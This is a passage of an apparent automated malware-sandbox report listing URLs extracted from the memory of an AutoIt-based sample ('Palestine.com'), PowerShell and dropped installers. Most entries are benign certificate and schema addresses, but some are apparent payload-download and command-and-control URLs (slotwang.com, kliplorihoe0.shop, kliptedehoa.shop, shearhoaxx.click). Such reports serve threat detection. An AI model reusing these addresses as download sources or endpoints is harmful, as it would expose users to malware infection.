                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0:
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngd
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp, msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/07/utility
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2003/03/rm
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2003/06/secext
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/03/addressing
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                Source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                Source: powershell.exe, 00000021.00000002.2261102876.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com02
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com05
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://web.resource.org/cc/
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.acronis.com/V
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmld
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000000.1281744220.0000000000BC5000.00000002.00000001.01000000.00000009.sdmp, electronics.exe, 00000043.00000000.2223887416.0000000000345000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS0
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.entrust.net/rpa03
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/licenses/lgpl-2.1.htmlF
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.com/SHSetUnreadMailCountW
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi/DeleteMessages
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi/GetMessage
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi/GetMetadata
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi/UpdateReadState
                Source: msn.exe, 00000027.00000002.2156116548.00000000096F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.inkscape.org/)
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.inkscape.org/namespaces/inkscape
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.macromedia.com/go/getflashplayer/
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.msn.com/webservices/spaces/v1/
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.msn.com/webservices/spaces/v1/GetXmlFeed
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.msn.com/webservices/spaces/v1/GetXmlFeedLouserzedConfig/ContactCard/GetXmlFeedRpsUrl
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
                Source: Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000021.00000002.2261102876.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://asuslogservice.azurewebsites.net/api/get_sas_token?code=
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://asuslogservicestorage.blob.core.windows.net/log-pool/
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600000.1&cta
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA05
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0:
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterd
                Source: Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Palestine.com, 00000011.00000003.1729130091.0000000006BED000.00000004.00000800.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000000.2019186157.0000000000591000.00000020.00000001.01000000.0000000D.sdmp, V2DDYDPIWYUTCJYUB0IV5.exe, 00000044.00000000.2346752958.0000000000CB7000.00000020.00000001.01000000.00000016.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                Source: Palestine.com, 00000011.00000002.2039631031.00000000048BC000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1992606677.00000000048B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliplorihoe0.shop/
                Source: Palestine.com, 00000011.00000002.2039631031.00000000048BC000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1992606677.00000000048B9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.0000000004307000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.2311177794.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2406753168.0000000004438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliplorihoe0.shop/int_clp_ldr_pan.txt
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001CA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliplorihoe0.shop/int_clp_ldr_pan.txt(
                Source: Palestine.com, 0000001F.00000002.2387321620.00000000015DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliplorihoe0.shop/int_clp_ldr_pan.txtV
                Source: Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliplorihoe0.shop:443/int_clp_ldr_pan.txt1
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptedehoa.shop
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptedehoa.shop/int_clp_pan.txt
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: https://loginnet.passport.com
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: https://nexus.passport.com/rdr/pprdr.asp
                Source: powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: https://ows.messenger.msn.com/OimWS/oim.asmx
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: https://rsi.hotmail.com/rsi/rsi.asmx
                Source: Palestine.com, 00000011.00000002.2036575036.0000000004760000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shearhoaxx.click/
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BF000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1560361265.00000000048B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shearhoaxx.click/K
                Source: Palestine.com, 0000001F.00000002.2389704146.0000000001610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shearhoaxx.click/api
                Source: Palestine.com, 00000011.00000002.2040719422.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shearhoaxx.click/api)5
                Source: Palestine.com, 0000001F.00000002.2389704146.0000000001610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shearhoaxx.click/api.
                Source: Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shearhoaxx.click:443/api
                Source: Palestine.com, 00000011.00000002.2023662646.0000000001ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shearhoaxx.click:443/apiges
                Source: Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shearhoaxx.click:443/apitxtPK
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.0000000004307000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slotwang.com/
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slotwang.com/3
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slotwang.com/I
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slotwang.com/file/Panorado.exe
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slotwang.com/file/Panorado.exeo%
                Source: Palestine.com, 0000001F.00000002.2399867318.0000000004307000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slotwang.com/tLA
                Source: Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slotwang.com:443/file/Panorado.exe
                Source: Palestine.com, 00000011.00000002.2023662646.0000000001ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slotwang.com:443/file/Panorado.exean.txt
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/CPS0
